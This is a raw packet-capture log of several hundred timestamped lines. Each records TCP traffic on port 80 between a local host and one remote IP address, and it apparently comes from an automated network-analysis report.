Dec 10, 2024 00:42:40.928282976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.929188013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.929230928 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.929238081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.929263115 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.930360079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.930409908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.930424929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.930464983 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.033466101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.033498049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.033530951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.033554077 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.033725023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.033763885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.033886909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.033925056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.034837961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.034882069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.034944057 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.034979105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.035959959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.036009073 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.036031008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.036068916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.069633007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.069691896 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.069822073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.069880009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.069902897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.069914103 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.069942951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.069951057 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.070941925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.070986986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.071193933 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.071233034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.072009087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.072052956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.072169065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.072221994 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.073175907 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.073199034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.073220015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.073240042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.074198008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.074270010 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.074304104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.074341059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.075305939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.075351954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.075428963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.075468063 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.076437950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.076477051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.076539040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.076587915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.077510118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.077553034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.077586889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.077622890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.078597069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.078640938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.078747034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.078788996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.079693079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.079739094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.079858065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.079907894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.080777884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.080817938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.080918074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.080954075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.081867933 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.081909895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.082041979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.082114935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.082978010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.083026886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.083132982 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.083170891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.084064960 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.084115982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.084187984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.084228039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.085151911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.085206985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.085335970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.085369110 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.086245060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.086288929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.086350918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.086445093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.087344885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.087383986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.087398052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.087430954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.088427067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.088469028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.088485956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.088519096 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.089663029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.089704990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.089731932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.089775085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.090612888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.090656996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.090708971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.090744019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.091725111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.091772079 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.091824055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.091861010 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.092812061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.092860937 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.092905998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.092951059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.093899965 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.093940973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.094063044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.094105005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.095046043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.095063925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.095129967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.095129967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.096115112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.096158981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.096199989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.096239090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.097223043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.097269058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.097332001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.097369909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.098304987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.098386049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.098409891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.098450899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.099361897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.099404097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.099457026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.099500895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.100531101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.100574017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.100629091 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.100663900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.101552010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.101597071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.101664066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.101701021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.102705956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.102756977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.102776051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.102809906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.103806973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.103863955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.104043007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.104079962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.104859114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.104908943 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.104928017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.104971886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.105984926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.106030941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.106187105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.106228113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.107103109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.107146025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.107255936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.107295036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.108177900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.108218908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.108273029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.108311892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.109241009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.109282017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.109348059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.109388113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.110375881 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.110419989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.110486031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.110521078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.111437082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.111498117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.111547947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.111584902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.112503052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.112541914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.112656116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.112698078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.113642931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.113688946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.113735914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.113775015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.114712954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.114761114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.114809036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.114892960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.115864038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.115905046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.115979910 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.116019011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.116955042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.116966009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.117038965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.117850065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.118024111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.118072987 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.118125916 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.118159056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.119173050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.119214058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.119370937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.119416952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.120220900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.120261908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.120393991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.120434046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.121290922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.121330976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.121351957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.121393919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.122399092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.122440100 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.122473955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.122531891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.225562096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.225650072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.225668907 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.225711107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.226099014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.226142883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.226187944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.226227999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.226946115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.226986885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.227058887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.227097034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.228028059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.228070021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.228143930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.228188992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.261406898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.261487961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.261508942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.261550903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.261872053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.261915922 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.261960983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.261998892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.263046980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.263087988 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.263200998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.263237000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.264077902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.264112949 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.264159918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.264197111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.265201092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.265238047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.265290022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.265326977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.266338110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.266375065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.266432047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.266475916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.267440081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.267492056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.267590046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.267632961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.268532991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.268573046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.268666983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.268704891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.269628048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.269668102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.269686937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.269720078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.270682096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.270720959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.270802021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.270838976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.271737099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.271776915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.271864891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.271903992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.272833109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.272876978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.273000002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.273040056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.273947001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.273987055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.274101973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.274139881 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.275038004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.275068998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.275187016 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.275226116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.276139975 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.276184082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.276326895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.276367903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.277231932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.277272940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.277369022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.277406931 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.278347015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.278388023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.278443098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.278482914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.279472113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.279510021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.279582977 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.279619932 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.280513048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.280567884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.280623913 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.280658007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.281610966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.281656027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.281677961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.281711102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.282695055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.282735109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.282812119 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.282850027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.283813000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.283854008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.283915043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.283951998 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.284938097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.284980059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.285064936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.285103083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.286014080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.286051989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.286134005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.286171913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.287095070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.287136078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.287270069 CET	80	49759	185.215.113.16	192.168.2.4
